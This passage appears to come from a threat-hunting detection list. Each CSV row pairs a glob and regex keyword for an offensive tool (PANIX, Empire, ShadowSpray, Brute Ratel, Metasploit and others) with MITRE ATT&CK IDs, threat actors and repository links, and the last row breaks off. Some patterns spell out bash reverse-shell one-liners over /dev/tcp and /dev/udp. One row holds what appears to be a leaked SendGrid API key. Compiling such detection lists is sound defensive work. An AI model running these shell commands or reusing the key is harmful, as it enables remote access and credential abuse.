"*setup_sudoers_backdoor*",".{0,1000}setup_sudoers_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58696" "*setup_suid_backdoor*",".{0,1000}setup_suid_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58697" "*setup_system_binary_backdoor*",".{0,1000}setup_system_binary_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58698" "*Set-WMIBackdoor -URL *",".{0,1000}Set\-WMIBackdoor\s\-URL\s.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","N/A","10","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","58699" "*Set-WorkingHours*",".{0,1000}Set\-WorkingHours.{0,1000}","offensive_tool_keyword","empire","empire function 
name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58700" "*sevagas/macro_pack*",".{0,1000}sevagas\/macro_pack.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","58701" "*seventeenman/CallBackDump*",".{0,1000}seventeenman\/CallBackDump.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","58702" 
"*sfewer-r7/CVE-2023-27532*",".{0,1000}sfewer\-r7\/CVE\-2023\-27532.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","1","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","58703" "*sfp_portscan_tcp.py*",".{0,1000}sfp_portscan_tcp\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","58704" "*sfp_torexits.py*",".{0,1000}sfp_torexits\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","58705" "*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*",".{0,1000}SG\.3xuRB22RTYaelD4sHiEBMw\.2wquktoAczDucX_KPgxXuo0xp\-h1hMnJ\-DLzBKOmIok.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","sendgrid api key","9","","N/A","","","","58706" "*sg.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}sg\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation 
OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","58707" "*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *",".{0,1000}sh\s\-c\s.{0,1000}ping\s\-c\s2\s\%s\s\sgrep\s\%s\s\/proc\/net\/arp\s\>\/tmp\/gx\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","58709" "*sh -i >& /dev/tcp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","58710" "*sh -i >& /dev/tcp/*/1337 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/1337\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58711" "*sh -i >& /dev/udp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/udp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","58713" "*sh -i 5<> /dev/tcp/*/* 0<&5 1>&5 2>&5*",".{0,1000}sh\s\-i\s5\<\>\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\<\&5\s1\>\&5\s2\>\&5.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","58714" "*Sha-2-*512.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-.{0,1000}512\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","58715" "*Sha-2-256.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-256\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","58716" "*Sha-2-384.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-384\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","58717" "*shad0w.beacons.keys*",".{0,1000}shad0w\.beacons\.keys.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation 
framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","58718" "*shadawck/glit*",".{0,1000}shadawck\/glit.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","58719" "*shadawck/recon-archy*",".{0,1000}shadawck\/recon\-archy.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","58721" "*shaddy43/BrowserSnatch*",".{0,1000}shaddy43\/BrowserSnatch.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","58722" "*shadow_copy.rb*",".{0,1000}shadow_copy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58723" "*shadow1ng/fscan*",".{0,1000}shadow1ng\/fscan.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","58724" "*shadowclock*",".{0,1000}shadowclock.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58725" "*shadowclone *",".{0,1000}shadowclone\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command 
and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58726" "*shadowcoerce.py *",".{0,1000}shadowcoerce\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58727" "*shadowcoerce_check*",".{0,1000}shadowcoerce_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58728" "*shadowcopy enum*",".{0,1000}shadowcopy\senum.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - 
T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58729" "*ShadowCredentials.Execute(*",".{0,1000}ShadowCredentials\.Execute\(.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","58730" "*shadowCredObject.NTHash*",".{0,1000}shadowCredObject\.NTHash.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58731" "*shadowCredObject.samAccountName*",".{0,1000}shadowCredObject\.samAccountName.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58732" "*shadowdump.*",".{0,1000}shadowdump\..{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","58733" "*ShadowDumper.exe*",".{0,1000}ShadowDumper\.exe.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","58734" "*ShadowForge.py*",".{0,1000}ShadowForge\.py.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","58735" "*ShadowForgeC2-main*",".{0,1000}ShadowForgeC2\-main.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","58736" "*shadowhound -Command *",".{0,1000}shadowhound\s\-Command\s.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58737" "*ShadowHound-ADM *",".{0,1000}ShadowHound\-ADM\s.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - 
TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58738" "*ShadowHound-ADM.ps1*",".{0,1000}ShadowHound\-ADM\.ps1.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58739" "*ShadowHound-DS *",".{0,1000}ShadowHound\-DS\s.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58740" "*ShadowHound-DS(*",".{0,1000}ShadowHound\-DS\(.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","#content","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58741" "*ShadowHound-DS.ps1*",".{0,1000}ShadowHound\-DS\.ps1.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58742" "*shadowsocks_server*shootback_slaver*",".{0,1000}shadowsocks_server.{0,1000}shootback_slaver.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","58753" "*ShadowSpray recovered*",".{0,1000}ShadowSpray\srecovered.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58758" "*ShadowSpray.Asn1*",".{0,1000}ShadowSpray\.Asn1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58759" "*ShadowSpray.DSInternals*",".{0,1000}ShadowSpray\.DSInternals.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58760" "*ShadowSpray.exe*",".{0,1000}ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58761" "*ShadowSpray.exe*",".{0,1000}ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","1","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58762" "*ShadowSpray.Kerb*",".{0,1000}ShadowSpray\.Kerb.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black 
Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58763" "*ShadowSpray.Kerb.lib*",".{0,1000}ShadowSpray\.Kerb\.lib.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58764" "*ShadowSpray.Kerb/1.0*",".{0,1000}ShadowSpray\.Kerb\/1\.0.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#useragent","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58765" "*ShadowSpray.sln*",".{0,1000}ShadowSpray\.sln.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in 